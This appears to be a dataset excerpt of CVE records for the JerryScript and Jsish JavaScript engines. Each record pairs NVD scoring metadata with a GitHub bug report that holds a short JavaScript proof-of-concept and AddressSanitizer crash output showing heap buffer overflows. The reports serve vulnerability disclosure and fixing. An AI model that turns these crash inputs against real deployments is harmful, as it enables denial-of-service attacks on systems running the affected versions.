"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4894"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4895"
},
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4894"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4895"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/4895 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: [51da1551](https://github.com/jerryscript-project/jerryscript/commit/51da15516e1436184be9914314f76d596f14cd27)
Version: v3.0.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
```
###### Test case
```javascript
function JSEtest(predicate, item) {
if (!predicate) {
log.push(item);
}
}
var global = this;
Object.getOwnPropertyNames(global).forEach(function (name) {
if (name[0] != name[0].toUpperCase()) {
return;
}
var obj = global[name];
if (!obj.toString().includes('native')) {
return;
}
try {
new obj();
} catch (e) {
;
}
var constructor = obj.constructor;
var prototype = obj.prototype;
var prototype_constructor = prototype.constructor;
JSEtest(`${name}.prototype.constructor`);
});
```
###### Execution steps & Output
```bash
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'ecma_object_check_class_name_is_object (obj_p)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_object_get_class_name):3009.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
Credits: Found by OWL337 team. | Assertion 'ecma_object_check_class_name_is_object (obj_p)' failed at ecma-objects.c(ecma_object_get_class_name) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4895/comments | 3 | 2021-12-09T14:58:57Z | 2022-01-12T02:09:35Z | https://github.com/jerryscript-project/jerryscript/issues/4895 | 1,075,669,945 | 4,895 | 3,086 |
CVE-2021-46474 | 2022-01-25T01:15:07.817 | Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiEvalCodeSub in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/57"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/57"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/pcmacdon/jsish/issues/57 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
assert(newObj.hasOwnProperty("prop")).throws(SyntaxError, function () {
eval("'use strict'; function _13_0_7_fun() {eval = 42;};");
_13_0_7_fun();
});
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028f8 at pc 0x55bcbd952990 bp 0x7ffd837e9530 sp 0x7ffd837e9520
READ of size 8 at 0x6250000028f8 thread T0
#0 0x55bcbd95298f in jsiEvalCodeSub src/jsiEval.c:1366
#1 0x55bcbd95c15e in jsi_evalcode src/jsiEval.c:2204
#2 0x55bcbd960274 in jsi_evalStrFile src/jsiEval.c:2665
#3 0x55bcbd64f66a in Jsi_Main src/jsiInterp.c:936
#4 0x55bcbde5403a in jsi_main src/main.c:47
#5 0x7f3599d46bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#6 0x55bcbd5e3969 in _start (/usr/local/bin/jsish+0xe8969)
0x6250000028f8 is located 8 bytes to the left of 8192-byte region [0x625000002900,0x625000004900)
allocated by thread T0 here:
#0 0x7f359a9b5f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x55bcbd654972 in Jsi_Realloc src/jsiUtils.c:47
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub
Shadow bytes around the buggy address:
0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
========ABORTING
```
Credits: Found by OWL337 team. | Heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub | https://api.github.com/repos/pcmacdon/jsish/issues/57/comments | 1 | 2021-12-24T09:47:27Z | 2022-01-12T02:12:21Z | https://github.com/pcmacdon/jsish/issues/57 | 1,088,279,556 | 57 | 3,087 |
CVE-2021-46475 | 2022-01-25T01:15:07.853 | Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsi_ArraySliceCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/64"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/64"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/pcmacdon/jsish/issues/64 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var arr = [
'aa',
'bb'
];
var results = [];
arr.findIndex(function (V) {
if (results.length === 0) {
arr.slice(1, arr.push('cc'));
}
});
results = [];
arr = [
'mm'
];
arr.findIndex(function (V) {
if (results.length === 0) {
arr.push('cc');
arr[1] = 'nn';
}
results.push(V);
});
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==87153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000018cc0 at pc 0x556c1807d671 bp 0x7ffc37cea3f0 sp 0x7ffc37cea3e0
READ of size 8 at 0x60c000018cc0 thread T0
#0 0x556c1807d670 in jsi_ArraySliceCmd src/jsiArray.c:912
#1 0x556c1804c818 in jsi_FuncCallSub src/jsiProto.c:244
#2 0x556c1831671a in jsiFunctionSubCall src/jsiEval.c:796
#3 0x556c1831671a in jsiEvalFunction src/jsiEval.c:837
#4 0x556c1831671a in jsiEvalCodeSub src/jsiEval.c:1264
#5 0x556c1832a15e in jsi_evalcode src/jsiEval.c:2204
#6 0x556c1804d834 in jsi_FuncCallSub src/jsiProto.c:220
#7 0x556c17fc9fec in jsi_FunctionInvoke src/jsiFunc.c:777
#8 0x556c17fc9fec in Jsi_FunctionInvoke src/jsiFunc.c:789
#9 0x556c1808ac0b in jsi_ArrayFindSubCmd src/jsiArray.c:576
#10 0x556c1808ac0b in jsi_ArrayFindIndexCmd src/jsiArray.c:666
#11 0x556c1804c818 in jsi_FuncCallSub src/jsiProto.c:244
#12 0x556c1831671a in jsiFunctionSubCall src/jsiEval.c:796
#13 0x556c1831671a in jsiEvalFunction src/jsiEval.c:837
#14 0x556c1831671a in jsiEvalCodeSub src/jsiEval.c:1264
#15 0x556c1832a15e in jsi_evalcode src/jsiEval.c:2204
#16 0x556c1832e274 in jsi_evalStrFile src/jsiEval.c:2665
#17 0x556c1801d66a in Jsi_Main src/jsiInterp.c:936
#18 0x556c1882203a in jsi_main src/main.c:47
#19 0x7f116a702bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#20 0x556c17fb1969 in _start (/usr/local/bin/jsish+0xe8969)
0x60c000018cc0 is located 0 bytes to the right of 128-byte region [0x60c000018c40,0x60c000018cc0)
allocated by thread T0 here:
#0 0x7f116b371f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x556c18022972 in Jsi_Realloc src/jsiUtils.c:47
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiArray.c:912 in jsi_ArraySliceCmd
Shadow bytes around the buggy address:
0x0c187fffb140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c187fffb150: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c187fffb160: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c187fffb170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fffb180: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c187fffb190: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
0x0c187fffb1a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fffb1b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fffb1c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fffb1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fffb1e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
``` | Heap-buffer-overflow src/jsiArray.c:912 in jsi_ArraySliceCmd | https://api.github.com/repos/pcmacdon/jsish/issues/64/comments | 0 | 2021-12-24T10:33:23Z | 2021-12-26T17:16:57Z | https://github.com/pcmacdon/jsish/issues/64 | 1,088,304,005 | 64 | 3,088 |
CVE-2021-46477 | 2022-01-25T01:15:07.893 | Jsish v3.5.0 was discovered to contain a heap buffer overflow via RegExp_constructor in src/jsiRegexp.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/63"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/63"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/pcmacdon/jsish/issues/63 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
function JSEtest() {
var bound;
var t;
bound = RegExp.bind('baz', 'quuux');
t = new bound('i');
}
try {
JSEtest();
} catch (e) {
}
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==21392==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018e48 at pc 0x55de4613ce12 bp 0x7ffdf013bf00 sp 0x7ffdf013bef0
WRITE of size 8 at 0x604000018e48 thread T0
#0 0x55de4613ce11 in RegExp_constructor src/jsiRegexp.c:176
#1 0x55de4619b818 in jsi_FuncCallSub src/jsiProto.c:244
#2 0x55de46118fec in jsi_FunctionInvoke src/jsiFunc.c:777
#3 0x55de46118fec in Jsi_FunctionInvoke src/jsiFunc.c:789
#4 0x55de46194ad6 in jsi_FuncBindCall src/jsiProto.c:299
#5 0x55de4619b818 in jsi_FuncCallSub src/jsiProto.c:244
#6 0x55de4646571a in jsiFunctionSubCall src/jsiEval.c:796
#7 0x55de4646571a in jsiEvalFunction src/jsiEval.c:837
#8 0x55de4646571a in jsiEvalCodeSub src/jsiEval.c:1264
#9 0x55de4647915e in jsi_evalcode src/jsiEval.c:2204
#10 0x55de4619c834 in jsi_FuncCallSub src/jsiProto.c:220
#11 0x55de464655ab in jsiFunctionSubCall src/jsiEval.c:796
#12 0x55de464655ab in jsiEvalFunction src/jsiEval.c:837
#13 0x55de464655ab in jsiEvalCodeSub src/jsiEval.c:1264
#14 0x55de4647915e in jsi_evalcode src/jsiEval.c:2204
#15 0x55de4647d274 in jsi_evalStrFile src/jsiEval.c:2665
#16 0x55de4616c66a in Jsi_Main src/jsiInterp.c:936
#17 0x55de4697103a in jsi_main src/main.c:47
#18 0x7ff1757adbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#19 0x55de46100969 in _start (/usr/local/bin/jsish+0xe8969)
0x604000018e48 is located 8 bytes to the left of 48-byte region [0x604000018e50,0x604000018e80)
allocated by thread T0 here:
#0 0x7ff17641cd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x55de46171aa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiRegexp.c:176 in RegExp_constructor
Shadow bytes around the buggy address:
0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb190: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
=>0x0c087fffb1c0: fa fa 00 00 00 00 00 04 fa[fa]00 00 00 00 00 00
0x0c087fffb1d0: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 06
0x0c087fffb1e0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
0x0c087fffb1f0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb200: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb210: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
Credits: Found by OWL337 team. | Heap-buffer-overflow src/jsiRegexp.c:176 in RegExp_constructor | https://api.github.com/repos/pcmacdon/jsish/issues/63/comments | 0 | 2021-12-24T10:32:32Z | 2022-01-12T02:13:42Z | https://github.com/pcmacdon/jsish/issues/63 | 1,088,303,589 | 63 | 3,089 |
CVE-2021-46478 | 2022-01-25T01:15:07.930 | Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiClearStack in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/60"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/60"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/pcmacdon/jsish/issues/60 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var a = Math.sin(Math.PI/2);
if (a === 1) {
switch (a) {
case assert(accessed, 'accessed !== true'): break;
default: throw "FAIL";
}
}
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==52181==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000000f8 at pc 0x55ff51f35d58 bp 0x7fff48257760 sp 0x7fff48257750
READ of size 8 at 0x6250000000f8 thread T0
#0 0x55ff51f35d57 in jsiClearStack src/jsiEval.c:120
#1 0x55ff51f35d57 in jsiPop src/jsiEval.c:200
#2 0x55ff51f35d57 in jsiEvalCodeSub src/jsiEval.c:1390
#3 0x55ff51f4215e in jsi_evalcode src/jsiEval.c:2204
#4 0x55ff51f46274 in jsi_evalStrFile src/jsiEval.c:2665
#5 0x55ff51c3566a in Jsi_Main src/jsiInterp.c:936
#6 0x55ff5243a03a in jsi_main src/main.c:47
#7 0x7fab5e008bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#8 0x55ff51bc9969 in _start (/usr/local/bin/jsish+0xe8969)
0x6250000000f8 is located 8 bytes to the left of 8192-byte region [0x625000000100,0x625000002100)
allocated by thread T0 here:
#0 0x7fab5ec77f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x55ff51c3a972 in Jsi_Realloc src/jsiUtils.c:47
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:120 in jsiClearStack
Shadow bytes around the buggy address:
0x0c4a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
0x0c4a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==52181==ABORTING
```
Credits: Found by OWL337 team.
| Heap-buffer-overflow src/jsiEval.c:120 in jsiClearStack | https://api.github.com/repos/pcmacdon/jsish/issues/60/comments | 0 | 2021-12-24T09:50:51Z | 2022-01-12T02:12:56Z | https://github.com/pcmacdon/jsish/issues/60 | 1,088,281,295 | 60 | 3,090 |
CVE-2021-46480 | 2022-01-25T01:15:07.970 | Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiValueObjDelete in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
